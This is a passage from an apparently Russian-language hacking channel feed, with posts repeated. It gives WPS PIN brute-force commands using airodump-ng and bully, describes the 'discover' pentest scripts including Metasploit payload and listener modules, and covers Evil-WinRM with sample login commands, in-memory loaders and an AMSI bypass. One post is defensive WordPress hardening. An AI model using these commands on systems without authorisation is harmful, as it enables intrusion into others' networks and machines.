Это позволит вам узнать, какой интерфейс будет использоваться для атаки (например,
wlan0
).😈 Второй шаг: Выбор цели
Далее с помощью утилиты
airodump-ng
определяем, какие сети поддерживают WPS:airodump-ng wlan0
Обратите внимание на столбец
WPS
. Это наши цели. Запишите BSSID и канал (CH) интересующей сети.😈 Третий шаг: Настройка Bully
Теперь мы готовы запустить Bully. Для атаки на конкретный BSSID используется следующая команда:
bully -b
🔥 Пример:
bully -b 11:22:33:44:55:66 -c 6 -v wlan0
Здесь:
-
-b
— указывает BSSID цели.-
-c
— канал сети.-
-v
— включает подробный вывод для мониторинга процесса.Разбираем загадку атаки
Bully использует уязвимость WPS PIN, перебирая возможные комбинации PIN-кодов. Он автоматически обрабатывает ошибки, такие как тайм-ауты или повторные запросы, что делает его эффективным инструментом для таких атак.


01.04.202507:06
💡 discover - репозитория содержащий пользовательские bash скрипты, используемые для автоматизации различных задач тестирования на проникновение, включая разведку, сканирование, перечисление и создание вредоносной нагрузки с помощью Metasploit.
💻 Установка:
Перед использованием discover стоит выбрать вариант 15 для обновления ОС и установки различных инструментов.
🛞 Модули:
RECON
⏺️Domain - пассивный поиск и нахождение зарегистрированных доменов. Под капотом использует ARIN, DNSRecon, dnstwist, subfinder, sublist3r, theHarvester, Metasploit, Whois и др. Для получения максимальных результатов необходимо вставить API ключи от theHarvester в /home/kali/.theHarvester/api-keys.yaml.
⏺️Person - объединяет информацию с нескольких веб-сайтов.
SCANNING
⏺️Generate target list - используются различные инструменты: Angry IP Scanner, arp-scan, netdiscover и Nmap pingsweep.
⏺️CIDR, List, IP, Range, or URL - содержит опции внешнего и внутреннего сканирования. Используется nmap, вспомогательные модули Metasploit, enum4linux, smbclient и ike-scan.
WEB
⏺️Open multiple tabs in Firefox - открывает несколько вкладок в Firefox. Может понадобится к примеру для просмотра всех отчетов Nikto, открытия всех директорий из файла robot.txt, списка, содержащего несколько IP-адресов и/или URL-адресов.
⏺️Nikto - запуск нескольких экземпляров Nikto параллельно для сканирования веб-серверов на наличие различных проблем безопасности.
⏺️SSL - проверка наличия проблем с сертификатами. Использует sslscan, sslyze и Nmap для проверки проблем с сертификатами SSL/TLS.
MISC
⏺️Parse XML - преобразование разных XML в формат CSV.
⏺️Generate a malicious payload - выбор вредоносной полезной нагрузки из модулей Metasploit для удаленного соединения с машиной жертвы.
⏺️Start a Metasploit listener - различные модули Metasploit для запуска листенера.
💻 Установка:
sudo git clone https://github.com/leebaird/discover /opt/discover/
Перед использованием discover стоит выбрать вариант 15 для обновления ОС и установки различных инструментов.
🛞 Модули:
RECON
⏺️Domain - пассивный поиск и нахождение зарегистрированных доменов. Под капотом использует ARIN, DNSRecon, dnstwist, subfinder, sublist3r, theHarvester, Metasploit, Whois и др. Для получения максимальных результатов необходимо вставить API ключи от theHarvester в /home/kali/.theHarvester/api-keys.yaml.
⏺️Person - объединяет информацию с нескольких веб-сайтов.
SCANNING
⏺️Generate target list - используются различные инструменты: Angry IP Scanner, arp-scan, netdiscover и Nmap pingsweep.
⏺️CIDR, List, IP, Range, or URL - содержит опции внешнего и внутреннего сканирования. Используется nmap, вспомогательные модули Metasploit, enum4linux, smbclient и ike-scan.
WEB
⏺️Open multiple tabs in Firefox - открывает несколько вкладок в Firefox. Может понадобится к примеру для просмотра всех отчетов Nikto, открытия всех директорий из файла robot.txt, списка, содержащего несколько IP-адресов и/или URL-адресов.
⏺️Nikto - запуск нескольких экземпляров Nikto параллельно для сканирования веб-серверов на наличие различных проблем безопасности.
⏺️SSL - проверка наличия проблем с сертификатами. Использует sslscan, sslyze и Nmap для проверки проблем с сертификатами SSL/TLS.
MISC
⏺️Parse XML - преобразование разных XML в формат CSV.
⏺️Generate a malicious payload - выбор вредоносной полезной нагрузки из модулей Metasploit для удаленного соединения с машиной жертвы.
⏺️Start a Metasploit listener - различные модули Metasploit для запуска листенера.
08.04.202516:46
Как мы отбивались от DDoS-атак и другой хакерской нечисти
В этой заметке — практические шаги, которые помогли нам отбиться от атак:
🔸 Жесткая настройка WordPress (отключение лишних функций, блокировка wp-login.php)
🔸 Фильтрация трафика через Cloudflare (правила для защиты от ботов и сканеров)
🔸 Блокировка прямых IP-подключений (чтобы не завалили сервер запросами)
🔸 Быстрое обнаружение и блокировка злоумышленников (UFW + анализ логов)
А ещё — личный опыт с разными CDN (включая StormWall) и советы, как не дать хакерам ни единого шанса.
🔴 Читать полную версию
Когда мой товарищ запустил блог на WordPress и форум на XenForo, он даже не подозревал, сколько "внимания" привлекут его ресурсы. Конкуренты и просто злоумышленники начали атаковать сайт: SQL-инъекции, брутфорс, DDoS — всё по полной программе.
В этой заметке — практические шаги, которые помогли нам отбиться от атак:
🔸 Жесткая настройка WordPress (отключение лишних функций, блокировка wp-login.php)
🔸 Фильтрация трафика через Cloudflare (правила для защиты от ботов и сканеров)
🔸 Блокировка прямых IP-подключений (чтобы не завалили сервер запросами)
🔸 Быстрое обнаружение и блокировка злоумышленников (UFW + анализ логов)
А ещё — личный опыт с разными CDN (включая StormWall) и советы, как не дать хакерам ни единого шанса.
🔴 Читать полную версию


24.03.202507:04
😈 Evil-WinRM
Утилита для удаленного подключения к компьютерам Windows с целью проведения тестирования на проникновение. Использует 5985 порт, предназначенный для протокола Windows Remote Management. WinRM — протокол, разработанный компанией Microsoft для удаленного управления и администрирования систем на базе Windows.
😡Установка и использование✔️:
Для работы утилиты требуется Ruby 2.3 или более поздняя версия. Также требуются некоторые библиотеки: winrm >=2.3.7, winrm-fs >=1.3.2, stringio >=0.0.2, logger >= 1.4.3, fileutils >= 0.7.2.
1️⃣ Установка непосредственно как библиотека Ruby:
2️⃣ Ручная установка:
Для запуска необходимо ввести:
3️⃣ Установка через bundler для изоляции зависимостей:
Запуск осуществляется через команду:
🔥Кроме предоставления удаленного доступа к устройству у инструмента есть следующие возможности :
⏺️upload - загрузка файлов с хоста, где запущен инструмент на удаленную машину. Для этого необходимо указывать абсолютный путь;
⏺️download - скачивает файлы с удаленной машины;
⏺️Invoke-Binary - позволяет выполнять сборки .Net в памяти;
⏺️Dll-Loader - позволяет загружать библиотеки DLL в память;
⏺️Donut-Loader - позволяет внедрять x64-полезные нагрузки;
⏺️Bypass-4MSI - патчит защиту AMSI;
⏺️services - список всех сервисов с указанием, есть ли у вашей учётной записи права доступа к каждому из них.
Утилита для удаленного подключения к компьютерам Windows с целью проведения тестирования на проникновение. Использует 5985 порт, предназначенный для протокола Windows Remote Management. WinRM — протокол, разработанный компанией Microsoft для удаленного управления и администрирования систем на базе Windows.
😡Установка и использование✔️:
Для работы утилиты требуется Ruby 2.3 или более поздняя версия. Также требуются некоторые библиотеки: winrm >=2.3.7, winrm-fs >=1.3.2, stringio >=0.0.2, logger >= 1.4.3, fileutils >= 0.7.2.
1️⃣ Установка непосредственно как библиотека Ruby:
gem install evil-winrm
. Запуск производится с помощью команды: evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!'
.2️⃣ Ручная установка:
sudo gem install winrm winrm-fs stringio logger fileutils
Для запуска необходимо ввести:
cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!'
.3️⃣ Установка через bundler для изоляции зависимостей:
gem install bundler
Запуск осуществляется через команду:
bundle exec evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!'
🔥Кроме предоставления удаленного доступа к устройству у инструмента есть следующие возможности :
⏺️upload - загрузка файлов с хоста, где запущен инструмент на удаленную машину. Для этого необходимо указывать абсолютный путь;
⏺️download - скачивает файлы с удаленной машины;
⏺️Invoke-Binary - позволяет выполнять сборки .Net в памяти;
⏺️Dll-Loader - позволяет загружать библиотеки DLL в память;
⏺️Donut-Loader - позволяет внедрять x64-полезные нагрузки;
⏺️Bypass-4MSI - патчит защиту AMSI;
⏺️services - список всех сервисов с указанием, есть ли у вашей учётной записи права доступа к каждому из них.
Log in to unlock more functionality.